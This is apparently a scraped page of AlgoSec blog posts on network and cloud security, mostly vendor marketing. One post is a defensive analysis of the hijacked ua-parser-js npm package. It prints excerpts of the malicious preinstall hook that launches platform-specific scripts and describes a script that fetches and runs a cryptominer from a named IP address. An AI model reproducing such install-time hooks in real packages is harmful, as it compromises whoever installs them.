top of page

Search results

615 results found with an empty search

  • AlgoSec | Achieving policy-driven application-centric security management for Cisco Nexus Dashboard Orchestrat

    Jeremiah Cornelius, Technical Lead for Alliances and Partners at AlgoSec, discusses how Cisco Nexus Dashboard Orchestrator (NDO) users... Application Connectivity Management Achieving policy-driven application-centric security management for Cisco Nexus Dashboard Orchestrat Jeremiah Cornelius 2 min read Jeremiah Cornelius Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 1/2/24 Published Jeremiah Cornelius, Technical Lead for Alliances and Partners at AlgoSec, discusses how Cisco Nexus Dashboard Orchestrator (NDO) users can achieve policy-driven application-centric security management with AlgoSec. Leading Edge of the Data Center with AlgoSec and Cisco NDO AlgoSec ASMS A32.6 is our latest release to feature a major technology integration, built upon our well-established collaboration with Cisco — bringing this partnership to the front of the Cisco innovation cycle with support for Nexus Dashboard Orchestrator (NDO) . NDO allows Cisco ACI – and legacy-style Data Center Network Management – to operate at scale in a global context, across data center and cloud regions. The AlgoSec solution with NDO brings the power of our intelligent automation and software-defined security features for ACI, including planning, change management, and microsegmentation, to this global scope. I urge you to see what AlgoSec delivers for ACI with multiple use cases, enabling application-mode operation and microsegmentation, and delivering integrated security operations workflows. AlgoSec now brings support for Shadow EPG and Inter-Site Contracts with NDO, to our existing ACI strength. Let’s Change the World by Intent I had my first encounter with Cisco Application Centric Infrastructure in 2014 at a Symantec Vision conference. The original Senior Product Manager and Technical Marketing lead were hosting a discussion about the new results from their recent Insieme acquisition and were eager to onboard new partners with security cases and added operations value. At the time I was promoting the security ecosystem of a different platform vendor, and I have to admit that I didn’t fully understand the tremendous changes that ACI was bringing to security for enterprise connectivity. It’s hard to believe that it’s now seven years since then and that Cisco ACI has mainstreamed software-defined networking — changing the way that network teams had grown used to running their networks and devices since at least the mid-’90s. Since that 2014 introduction, Cisco’s ACI changed the landscape of data center networking by introducing an intent-based approach, over earlier configuration-centric architecture models. This opened the way for accelerated movement by enterprise data centers to meet their requirements for internal cloud deployments, new DevOps and serverless application models, and the extension of these to public clouds for hybrid operation – all within a single networking technology that uses familiar switching elements. Two new, software-defined artifacts make this possible in ACI: End-Point Groups (EPG) and Contracts – individual rules that define characteristics and behavior for an allowed network connection. ACI Is Great, NDO Is Global That’s really where NDO comes into the picture. By now, we have an ACI-driven data center networking infrastructure, with management redundancy for the availability of applications and preserving their intent characteristics. Through the use of an infrastructure built on EPGs and contracts, we can reach from the mobile and desktop to the datacenter and the cloud. This means our next barrier is the sharing of intent-based objects and management operations, beyond the confines of a single data center. We want to do this without clustering types, that depend on the availability risk of individual controllers, and hit other limits for availability and oversight. Instead of labor-intensive and error-prone duplication of data center networks and security in different regions, and for different zones of cloud operation, NDO introduces “stretched” shadow EPGs, and inter-site contracts, for application-centric and intent-based, secure traffic which is agnostic to global topologies – wherever your users and applications need to be. NDO Deployment Topology – Image: Cisco Getting NDO Together with AlgoSec: Policy-Driven, App-Centric Security Management  Having added NDO capability to the formidable shared platform of AlgoSec and Cisco ACI, regional-wide and global policy operations can be executed in confidence with intelligent automation. AlgoSec makes it possible to plan for operations of the Cisco NDO scope of connected fabrics in application-centric mode, unlocking the ACI super-powers for micro-segmentation. This enables a shared model between networking and security teams for zero-trust and defense-in-depth, with accelerated, global-scope, secure application changes at the speed of business demand — within minutes, rather than days or weeks. Change management : For security policy change management this means that workloads may be securely re-located from on-premises to public cloud, under a single and uniform network model and change-management framework — ensuring consistency across multiple clouds and hybrid environments. Visibility : With an NDO-enabled ACI networking infrastructure and AlgoSec’s ASMS, all connectivity can be visualized at multiple levels of detail, across an entire multi-vendor, multi-cloud network. This means that individual security risks can be directly correlated to the assets that are impacted, and a full understanding of the impact by security controls on an application’s availability. Risk and Compliance : It’s possible across all the NDO connected fabrics to identify risk on-premises and through the connected ACI cloud networks, including additional cloud-provider security controls. The AlgoSec solution makes this a self-documenting system for NDO, with detailed reporting and an audit trail of network security changes, related to original business and application requests. This means that you can generate automated compliance reports, supporting a wide range of global regulations, and your own, self-tailored policies. The Road Ahead Cisco NDO is a major technology and AlgoSec is in the early days with our feature introduction, nonetheless, we are delighted and enthusiastic about our early adoption customers. Based on early reports with our Cisco partners, needs will arise for more automation, which would include the “zero-touch” push for policy changes – committing Shadow EPG and Inter-site Contract changes to the orchestrator, as we currently do for ACI APIC. Feedback will also shape a need for automation playbooks and workflows that are most useful in the NDO context, and that we can realize with a full committable policy by the ASMS Firewall Analyzer. Contact Us! I encourage anyone interested in NDO and enhancing their operational maturity in aligned network and security operation, to talk to us about our joint solution. We work together with Cisco teams and resellers and will be glad to share more. Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

  • AlgoSec security management solution for Juniper Networks - AlgoSec

    AlgoSec security management solution for Juniper Networks Solution Brief Download PDF Schedule time with one of our experts Schedule time with one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue

  • AlgoSec | Hijacked NPM Account Leads to Critical Supply Chain Compromise

    As earlier reported by US-CERT, three versions of a popular NPM package named ua-parser-js were found to contain malware. The NPM package... Cloud Security Hijacked NPM Account Leads to Critical Supply Chain Compromise Rony Moshkovich 2 min read Rony Moshkovich Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 10/24/21 Published As earlier reported by US-CERT, three versions of a popular NPM package named ua-parser-js were found to contain malware. The NPM package ua-parser-js is used in apps and websites to discover the type of device or browser a person is using from User-Agent data. The author of the package, Faisal Salman – a software developer from Indonesia, has commented about the incident: Hi all, very sorry about this. I noticed something unusual when my email was suddenly flooded by spams from hundreds of websites (maybe so I don’t realize something was up, luckily the effect is quite the contrary). I believe someone was hijacking my npm account and published some compromised packages (0.7.29, 0.8.0, 1.0.0) which will probably install malware as can be seen from the diff here: https://app.renovatebot.com/package-diff?name=ua-parser-js&from=0.7.28&to=1.0.0 I have sent a message to NPM support since I can’t seem to unpublish the compromised versions (maybe due to npm policy https://docs.npmjs.com/policies/unpublish ) so I can only deprecate them with a warning message. There are more than 2.5 million other repositories that depend on ua-parser-js . Google search “file:ua-parser-js.js” reveals nearly 2 million websites, which indicates the package is popular. As seen in the source code diff , the newly added file package/preinstall.js will check the OS platform. If it’s Windows, the script will spawn a newly added preinstall.bat script. If the OS is Linux, the script will call terminalLinux() function, as seen in the source below: var opsys = process.platform; if ( opsys == "darwin" ) { opsys = "MacOS" ; } else if ( opsys == "win32" || opsys == "win64" ) { opsys = "Windows" ; const { spawn } = require ( 'child_process' ) ; const bat = spawn ( 'cmd.exe' , [ '/c' , 'preinstall.bat' ]) ; } else if ( opsys == "linux" ) { opsys = "Linux" ; terminalLinux () ; } The terminalLinux() function will run the newly added preinstall.sh script. function terminalLinux(){ exec( "/bin/bash preinstall.sh" , (error, stdout, stderr) => { ... }); } The malicious preinstall.sh script first queries an XML file that will report the current user’s geo-location by visiting this URL . For example, for a user located in Australia, the returned content will be: [IP_ADDRESS] AU Australia ... Next, the script searches for the presence of the following country codes in the returned XML file: RU UA BY KZ That is, the script identifies if the affected user is located in Russia, Ukraine, Belarus, or Kazakhstan. Suppose the user is NOT located in any of these countries. In that case, the script will then fetch and execute malicious ELF binary jsextension from a server with IP address 159.148.186.228, located in Latvia. jsextension binary is an XMRig cryptominer with reasonably good coverage by other AV products. Conclusion The compromised ua-parser-js is a showcase of a typical supply chain attack. Last year, Prevasio found and reported a malicious package flatmap-stream in 1,482 Docker container images hosted in Docker Hub with a combined download count of 95M. The most significant contributor was the trojanized official container image of Eclipse. What’s fascinating in this case, however, is the effectiveness of the malicious code proliferation. It only takes one software developer to ignore a simple trick that reliably prevents these things from happening. The name of this trick is two-factor authentication (2FA). About the Country Codes Some people wonder why cybercriminals from Russia often avoid attacking victims outside of their country or other Russian-speaking countries. Some go as far as suggesting it’s for their own legal protection. The reality is way simpler, of course: “Не гадь там, где живешь” “Не сри там, где ешь” “Не плюй в колодец, пригодится воды напиться” Polite translation of all these sayings is: “One should not cause trouble in a place, group, or situation where one regularly finds oneself.” Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

  • AlgoSec | The importance of bridging NetOps and SecOps in network management

    Tsippi Dach, Director of Communications at AlgoSec, explores the relationship between NetOps and SecOps and explains why they are the... DevOps The importance of bridging NetOps and SecOps in network management Tsippi Dach 2 min read Tsippi Dach Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 4/16/21 Published Tsippi Dach, Director of Communications at AlgoSec, explores the relationship between NetOps and SecOps and explains why they are the perfect partnership The IT landscape has changed beyond recognition in the past decade or so. The vast majority of businesses now operate largely in the cloud, which has had a notable impact on their agility and productivity. A recent survey of 1,900 IT and security professionals found that 41 percent or organizations are running more of their workloads in public clouds compared to just one-quarter in 2019. Even businesses that were not digitally mature enough to take full advantage of the cloud will have dramatically altered their strategies in order to support remote working at scale during the COVID-19 pandemic. However, with cloud innovation so high up the boardroom agenda, security is often left lagging behind, creating a vulnerability gap that businesses can little afford in the current heightened risk landscape. The same survey found the leading concern about cloud adoption was network security (58%). Managing organizations’ networks and their security should go hand-in-hand, but, as reflected in the survey, there’s no clear ownership of public cloud security. Responsibility is scattered across SecOps, NOCs and DevOps, and they don’t collaborate in a way that aligns with business interests. We know through experience that this siloed approach hurts security, so what should businesses do about it? How can they bridge the gap between NetOps and SecOps to keep their network assets secure and prevent missteps? Building a case for NetSecOps Today’s digital infrastructure demands the collaboration, perhaps even the convergence, of NetOps and SecOps in order to achieve maximum security and productivity. While the majority of businesses do have open communication channels between the two departments, there is still a large proportion of network and security teams working in isolation. This creates unnecessary friction, which can be problematic for service-based businesses that are trying to deliver the best possible end-user experience. The reality is that NetOps and SecOps share several commonalities. They are both responsible for critical aspects of a business and have to navigate constantly evolving environments, often under extremely restrictive conditions. Agility is particularly important for security teams in order for them to keep pace with emerging technologies, yet deployments are often stalled or abandoned at the implementation phase due to misconfigurations or poor execution. As enterprises continue to deploy software-defined networks and public cloud architecture, security has become even more important to the network team, which is why this convergence needs to happen sooner rather than later. We somehow need to insert the network security element into the NetOps pipeline and seamlessly make it just another step in the process. If we had a way to automatically check whether network connectivity is already enabled as part of the pre-delivery testing phase, that could, at least, save us the heartache of deploying something that will not work. Thankfully, there are tools available that can bring SecOps and NetOps closer together, such as Cisco ACI , Cisco Secure Workload and AlgoSec Security Management Solution . Cisco ACI, for instance, is a tightly coupled policy-driven solution that integrates software and hardware, allowing for greater application agility and data center automation. Cisco Secure Workload (previously known as Tetration), is a micro-segmentation and cloud workload protection platform that offers multi-cloud security based on a zero-trust model. When combined with AlgoSec, Cisco Secure Workload is able to map existing application connectivity and automatically generate and deploy security policies on different network security devices, such as ACI contract, firewalls, routers and cloud security groups. So, while Cisco Secure Workload takes care of enforcing security at each and every endpoint, AlgoSec handles network management. This is NetOps and SecOps convergence in action, allowing for 360-degree oversight of network and security controls for threat detection across entire hybrid and multi-vendor frameworks. While the utopian harmony of NetOps and SecOps may be some way off, using existing tools, processes and platforms to bridge the divide between the two departments can mitigate the ‘silo effect’ resulting in stronger, safer and more resilient operations. We recently hosted a webinar with Doug Hurd from Cisco and Henrik Skovfoged from Conscia discussing how you can bring NetOps and SecOps teams together with Cisco and AlgoSec. You can watch the recorded session here . Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

  • AlgoSec | Network Change Management: Best Practices for 2024

    What is network change management? Network Change Management (NCM) is the process of planning, testing, and approving changes to a... Network Security Policy Management Network Change Management: Best Practices for 2024 Tsippi Dach 2 min read Tsippi Dach Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 2/8/24 Published What is network change management? Network Change Management (NCM) is the process of planning, testing, and approving changes to a network infrastructure. The goal is to minimize network disruptions by following standardized procedures for controlled network changes. NCM, or network configuration and change management (NCCM), is all about staying connected and keeping things in check. When done the right way, it lets IT teams seamlessly roll out and track change requests, and boost the network’s overall performance and safety. There are 2 main approaches to implementing NCM: manual and automated. Manual NCM is a popular choice that’s usually complex and time-consuming. A poor implementation may yield faulty or insecure configurations causing disruptions or potential noncompliance. These setbacks can cause application outages and ultimately need extra work to resolve. Fortunately, specialized solutions like the AlgoSec platform and its FireFlow solution exist to address these concerns. With inbuilt intelligent automation, these solutions make NCM easier as they cut out errors and rework usually tied to manual NCM. The network change management process The network change management process is a structured approach that organizations use to manage and implement changes to their network infrastructure. When networks are complex with many interdependent systems and components, change needs to be managed carefully to avoid unintended impacts. A systematic NCM process is essential to make the required changes promptly, minimize risks associated with network modifications, ensure compliance, and maintain network stability. The most effective NCM process leverages an automated NCM solution like the intelligent automation provided by the AlgoSec platform to streamline effort, reduce the risks of redundant changes, and curtail network outages and downtime. The key steps involved in the network change management process are: Step 1: Security policy development and documentation Creating a comprehensive set of security policies involves identifying the organization’s specific security requirements, relevant regulations, and industry best practices. These policies and procedures help establish baseline configurations for network devices. They govern how network changes should be performed – from authorization to execution and management. They also document who is responsible for what, how critical systems and information are protected, and how backups are planned. In this way, they address various aspects of network security and integrity, such as access control , encryption, incident response, and vulnerability management. Step 2: Change the request A formal change request process streamlines how network changes are requested and approved. Every proposed change is clearly documented, preventing the implementation of ad-hoc or unauthorized changes. Using an automated tool ensures that every change complies with the regulatory standards relevant to the organization, such as HIPAA, PCI-DSS, NIST FISMA, etc. This tool should be able to send automated notifications to relevant stakeholders, such as the Change Advisory Board (CAB), who are required to validate and approve normal and emergency changes (see below). Step 3: Change Implementation Standard changes – those implemented using a predetermined process, need no validation or testing as they’re already deemed low- or no-risk. Examples include installing a printer or replacing a user’s laptop. These changes can be easily managed, ensuring a smooth transition with minimal disruption to daily operations. On the other hand, normal and emergency changes require testing and validation, as they pose a more significant risk if not implemented correctly. Normal changes, such as adding a new server or migrating from on-premises to the cloud, entail careful planning and execution. Emergency changes address urgent issues that could introduce risks if not resolved promptly, like failing to install security patches or software upgrades, which may leave networks vulnerable to zero-day exploits and cyberattacks. Testing uncovers these potential risks, such as network downtime or new vulnerabilities that increase the likelihood of a malware attack. Automated network change management (NCM) solutions streamline simple changes, saving time and effort. For instance, AlgoSec’s firewall policy cleanup solution optimizes changes related to firewall policies, enhancing efficiency. Documenting all implemented changes is vital, as it maintains accountability and service level agreements (SLAs) while providing an audit trail for optimization purposes. The documentation should outline the implementation process, identified risks, and recommended mitigation steps. Network teams must establish monitoring systems to continuously review performance and flag potential issues during change implementation. They must also set up automated configuration backups for devices like routers and firewalls ensuring that organizations can recover from change errors and avoid expensive downtime. Step 4: Troubleshooting and rollbacks Rollback procedures are important because they provide a way to restore the network to its original state (or the last known “good” configuration) if the proposed change could introduce additional risk into the network or deteriorate network performance. Some automated tools include ready-to-use templates to simplify configuration changes and rollbacks. The best platforms use a tested change approval process that enables organizations to avoid bad, invalid, or risky configuration changes before they can be deployed. Troubleshooting is also part of the NCM process. Teams must be trained in identifying and resolving network issues as they emerge, and in managing any incidents that may result from an implemented change. They must also know how to roll back changes using both automated and manual methods. Step 5: Network automation and integration Automated network change management (NCM) solutions streamline and automate key aspects of the change process, such as risk analysis, implementation, validation, and auditing. These automated solutions prevent redundant or unauthorized changes, ensuring compliance with applicable regulations before deployment. Multi-vendor configuration management tools eliminate the guesswork in network configuration and change management. They empower IT or network change management teams to: Set real-time alerts to track and monitor every change Detect and prevent unauthorized, rogue, and potentially dangerous changes Document all changes, aiding in SLA tracking and maintaining accountability Provide a comprehensive audit trail for auditors Execute automatic backups after every configuration change Communicate changes to all relevant stakeholders in a common “language” Roll back undesirable changes as needed AlgoSec’s NCM platform can also be integrated with IT service management (ITSM) and ticketing systems to improve communication and collaboration between various teams such as IT operations and admins. Infrastructure as code (IaC) offers another way to automate network change management. IaC enables organizations to “codify” their configuration specifications in config files. These configuration templates make it easy to provision, distribute, and manage the network infrastructure while preventing ad-hoc, undocumented, or risky changes. Risks associated with network change management Network change management is a necessary aspect of network configuration management. However, it also introduces several risks that organizations should be aware of. Network downtime The primary goal of any change to the network should be to avoid unnecessary downtime. Whenever these network changes fail or throw errors, there’s a high chance of network downtime or general performance. Depending on how long the outage lasts, it usually results in users losing productive time and loss of significant revenue and reputation for the organization. IT service providers may also have to monitor and address potential issues, such as IP address conflicts, firmware upgrades, and device lifecycle management. Human errors Manual configuration changes introduce human errors that can result in improper or insecure device configurations. These errors are particularly prevalent in complex or large-scale changes and can increase the risk of unauthorized or rogue changes. Security issues Manual network change processes may lead to outdated policies and rulesets, heightening the likelihood of security concerns. These issues expose organizations to significant threats and can cause inconsistent network changes and integration problems that introduce additional security risks. A lack of systematic NCM processes can further increase the risk of security breaches due to weak change control and insufficient oversight of configuration files, potentially allowing rogue changes and exposing organizations to various cyberattacks. Compliance issues Poor NCM processes and controls increase the risk of non-compliance with regulatory requirements. This can potentially result in hefty financial penalties and legal liabilities that may affect the organization’s bottom line, reputation, and customer relationships. Rollback failures and backup issues Manual rollbacks can be time-consuming and cumbersome, preventing network teams from focusing on higher-value tasks. Additionally, a failure to execute rollbacks properly can lead to prolonged network downtime. It can also lead to unforeseen issues like security flaws and exploits. For network change management to be effective, it’s vital to set up automated backups of network configurations to prevent data loss, prolonged downtime, and slow recovery from outages. Troubleshooting issues Inconsistent or incorrect configuration baselines can complicate troubleshooting efforts. These wrong baselines increase the chances of human error, which leads to incorrect configurations and introduces security vulnerabilities into the network. Simplified network change management with AlgoSec AlgoSec’s configuration management solution automates and streamlines network management for organizations of all types. It provides visibility into the configuration of every network device and automates many aspects of the NCM process, including change requests, approval workflows, and configuration backups. This enables teams to safely and collaboratively manage changes and efficiently roll back whenever issues or outages arise. The AlgoSec platform monitors configuration changes in real-time. It also provides compliance assessments and reports for many security standards, thus helping organizations to strengthen and maintain their compliance posture. Additionally, its lifecycle management capabilities simplify the handling of network devices from deployment to retirement. Vulnerability detection and risk analysis features are also included in AlgoSec’s solution. The platform leverages these features to analyze the potential impact of network changes and highlight possible risks and vulnerabilities. This information enables network teams to control changes and ensure that there are no security gaps in the network. Click here to request a free demo of AlgoSec’s feature-rich platform and its configuration management tools. Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

  • Fortinet partner solution brief - AlgoSec

    Fortinet partner solution brief Download PDF Schedule time with one of our experts Schedule time with one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Continue

  • AlgoSec | CSPM vs. CNAPP: Which Solution to Choose?

    Protecting cloud-based applications and workloads requires robust security solutions such as CSPM, CIEM and CWPP. CNAPP tries to answer... Cloud Security CSPM vs. CNAPP: Which Solution to Choose? Rony Moshkovich 2 min read Rony Moshkovich Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 11/24/22 Published Protecting cloud-based applications and workloads requires robust security solutions such as CSPM, CIEM and CWPP. CNAPP tries to answer all 3 but how do you know which solution is right for your specific organization? Ava Chawla, AlgoSec’s Global Head of Cloud Security unravels the differences between them and shares her expert opinion on the solution that offers the most value for organizations. What is Cloud Security Posture Management (CSPM)? A CSPM tool monitors the logs and configuration files of the services you use in your cloud environment. It will scan the entire cloud environment to detect and prevent misconfiguration errors. This is important because configurations in the cloud happen quickly and just as quickly introduce new threats into the environment. For robust ongoing protection, you need to monitor the environment continuously and automatically. Here’s where CSPM comes in. The best CSPM solutions implement configuration best practices and automatically initiate corrective actions to remove risks, thus improving cloud security, ensuring adherence to compliance policies, and reducing the likelihood of breaches. Additionally, they are agentless, do not require long configuration, and don’t add to your cloud bills by utilizing additional cloud resources. What is Cloud Infrastructure Entitlement Management (CIEM)? In cloud environments, identity goes beyond users and groups. It also plays a vital role in managing all the resources and services that need to access data. All these accesses happen very quickly and constitute a complex web of interactions. It’s crucial to know when and between whom these interactions occur to ensure that only legitimate resources can access or modify data. But as your cloud resources increase, the complexity of entitlements also grows. It’s not easy to keep track of these entitlements or to maintain the security-focused principle of least privilege (PoLP). CIEM tools are specialized identity-centric solutions to manage cloud access risk and govern entitlements in hybrid and multi-cloud environments. With CIEM, you can manage entitlements across all your cloud resources and maintain PoLP to mitigate the risk created by granting excessive permissions to cloud resources. What is a Cloud Workload Protection Platform (CWPP)? CWPP solutions manage cloud applications and workloads. They can reach back into on- prem environments and thus effectively detect and prevent security problems like malware and vulnerabilities across the entire hybrid landscape. CWPP solutions can scale automatically and support your organization as your cloud environment grows or changes. What is a Cloud Native Application Protection Platform (CNAPP)? Each of these solutions are geared towards a specific area of cloud security. CSPM prevents misconfiguration errors, CIEM platforms manage cloud access risks, and CWPP protects your assets and workloads. But what if you want a single solution that can completely manage the security of your cloud environment? Try a Cloud Native Application Protection Platform . CNAPP solutions combine security posture management, workload protection, and entitlement management into one single platform to provide comprehensive, holistic security across multi-cloud environments. Thus, you can protect your entire cloud estate with one solution instead of having to implement and manage multiple point solutions. Another advantage of a CNAPP tool is that it will enable you to “shift left”. Thus, you can not only secure applications in production environments, but also manage the runtime and DevOps aspects of security. For this reason, these platforms are aimed at both security professionals and DevOps practitioners. Conclusion and Next Steps A CNAPP solution is the most comprehensive solution. However, in today’s market there is no one tool that truly covers all the functionalities that CNAPP promises. Therefore, each organization should choose the solution that fits its immediate needs, including taking other considerations into account such as the skill level and the maturity of its cloud adoption. One important thing to remember: Regardless of the solution you choose, make sure it’s agentless. Agentless is important in today’s cloud security because agent-based solutions are hard to manage, expensive, and intrusive. If you’re looking for a modern agentless CSPM with container protection to safeguard your cloud-based application and workload data, then Prevasio might be the best option for you. Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

  • AlgoSec | Azure Security Best Practices

    Azure Security Best Practices: Don't Get Caught with Your Cloud Pants Down   Executive Summary   The cloud isn't some futuristic fantasy... Cloud Security Azure Security Best Practices Asher Benbenisty 2 min read Asher Benbenisty Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 11/25/24 Published Azure Security Best Practices: Don't Get Caught with Your Cloud Pants Down Executive Summary The cloud isn't some futuristic fantasy anymore, folks. It's the backbone of modern business, and Azure is charging hard, fueled by AI, to potentially dethrone AWS by 2026. But with this breakneck adoption comes a harsh reality: security can't be an afterthought. This article dives deep into why robust security practices are non-negotiable in Azure and how tools like Microsoft Sentinel and Defender XDR can be your digital bodyguards. Introduction Let's face it, organizations are flocking to the cloud like moths to a digital flame. Why? Cost savings, streamlined operations, and the ability to scale at warp speed. We're talking serious money here – a projected $805 billion spent on public cloud services in 2024! The cloud's not just disrupting the game; it is the game. And the playing field is shifting. AWS might be the king of the hill right now, but Azure's hot on its heels, thanks to some serious AI muscle. ( As of 2024, they hold market shares of 31%, 24%, and 11%, respectively .) Forbes even predicts an Azure takeover by 2026. Exciting times, right? Hold your horses. This rapid cloud adoption has a dark side. Security threats are lurking around every corner, and sticking to best practices is more crucial than ever. Cloud service managers, listen up: you need to wrap your heads around the shared responsibility model (Figure 1). Think of it like this: you and Azure are partners in crime prevention. You're both responsible for keeping your digital assets safe, but you need to know who's holding which piece of the security puzzle. Don't assume security is built-in – it's a team effort, and you need to pull your weight. Figure 1: The shared responsibility model Azure's Security Architecture: A Fortress in the Cloud Okay, I get it. The shared responsibility model can feel like navigating a maze blindfolded. But here's the deal: whether you're dabbling in IaaS, PaaS, or SaaS, Azure's got your infrastructure covered. Their global network of data centers is built like Fort Knox, meeting industry standards like ISO/IEC 27001:2022 , HIPAA , and NIST SP 800-53 . But remember your part of the bargain! Azure provides a killer arsenal of security products to protect your workloads, both in Azure and beyond. Figure 2: Azure’s security architecture Take Microsoft Sentinel, for example. This superhero of a tool automatically sniffs out threats, investigates them, and neutralizes them before they can wreak havoc. It's like having a 24/7 security team with superhuman senses. And don't forget about Microsoft Defender XDR. This comprehensive security suite is like a digital Swiss Army knife, protecting your identities, endpoints, applications, email, and cloud apps. It's got your back, no matter where you turn. With Sentinel and Defender XDR in your corner, you're well-equipped to tackle the security challenges that come with cloud adoption. But don't get complacent! Let's dive into some core security best practices that will make your Azure environment an impenetrable fortress. Core Security Best Practices: Lock Down Your Secrets Protecting Secrets: Best Practices Using Azure Key Vault We all have secrets, right? In the digital world, those secrets are things like passwords, API keys, and encryption keys. You can't just leave them lying around for any cybercriminal to snatch. That's where Azure Key Vault comes in. This secure vault is like a digital safe deposit box for your sensitive data. It uses hardware security modules (HSMs) to keep your secrets locked down tight, even if someone manages to breach your defenses. Big names like Victoria's Secret & Co , Evup, and Sage trust Key Vault to keep their secrets safe. Figure 3: A new Key Vault named “algosec-kv” Here's a pro tip: once you've stashed your secrets in Key Vault, use a managed identity to access them. This eliminates the need to hardcode credentials in your code, minimizing the risk of exposure. var client = new SecretClient(new Uri("https://. vault.azure.net/ "), new DefaultAzureCredential(),options); KeyVaultSecret secret = client.GetSecret(""); string secretValue = secret.Value; Key Vault is a fantastic tool, but it's not a silver bullet. Download our checklist of additional best practices to keep your secrets safe: Database and Data Security: More Than Just Locking the Door Azure offers a smorgasbord of data storage solutions, from Azure SQL Database to Azure Blob Storage. But securing your data isn't just about protecting it at rest. You need to think about data in use and data in transit, too. Download our checklist for a full action plan: Identity Management: Who Are You, and What Are You Doing Here? Encryption is great, but it's only half the battle. You need to know who's accessing your resources and what they're doing. That's where identity access management (IAM) comes in. Think of IAM as a digital bouncer, controlling access to your network resources. It's all about verifying identities and granting the right level of access – no more, no less. Zero-trust network access (ZTNA) is your secret weapon here. It's like having a security checkpoint at every corner of your network, ensuring that only authorized users can access your resources. Figure 4: Zero-trust security architecture Remember the Capital One breach? A misconfigured firewall and overly broad permissions led to a massive data leak. Don't let that be you! Follow Azure's IAM documentation to build a robust and secure identity management system. Network Security: Building a Digital Moat Your network architecture is the foundation of your security posture. Choose wisely, my friends! The hub-spoke model is a popular choice in Azure, centralizing common services in a secure hub and isolating workloads in separate spokes. Figure 5: Hub-spoke network architecture in Azure (Source: Azure documentation ) For a checklist of how the hub-spoke model can boosts your security, download our checklist here. Digital Realty , a real estate investment giant, uses the hub-spoke model to secure its global portal and REST APIs. It's a testament to the power of this architecture for both security and performance. Figure 6: Digital Realty’s use of hub-spoke architecture (Adapted from Microsoft Customer Stories ) Operational Security: Stay Vigilant, Stay Secure (Continued) When a security incident strikes, your response time is critical. Think of operational security as your digital first aid kit. It's about minimizing human error and automating processes to speed up threat detection and response. We've already talked about MFA, password management, and the dynamic duo of Defender XDR and Sentinel. Download our checklist for a few more operational security essentials to add to your arsenal. Figure 7: Build-deploy workflow automation (Source: Azure documentation ) Think of these best practices as guardrails, guiding you toward secure decisions. But remember, flexibility is key. Adapt these practices to your specific environment and architecture. Conclusion As Azure's popularity skyrockets, so do the stakes. The shared responsibility model means you're not off the hook when it comes to security. Azure provides powerful tools like Sentinel and Defender XDR, but it's up to you to use them wisely and follow best practices. Protect your secrets like they're buried treasure, secure your data with Fort Knox-level encryption, implement identity management that would make a border patrol agent proud, and build a network architecture that's a digital fortress. And don't forget about operational security – it's the glue that holds it all together. But let's be real, managing security policies across multiple clouds can be a nightmare. That's where tools like AlgoSec CloudFlow come in. They provide a clear view of your security landscape, helping you identify vulnerabilities and streamline policy management. It's like having a security command center for your entire cloud infrastructure. So, what are you waiting for? Request a demo today and let AlgoSec help you build an Azure environment that's so secure, even the most determined cybercriminals will be left scratching their heads. Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* 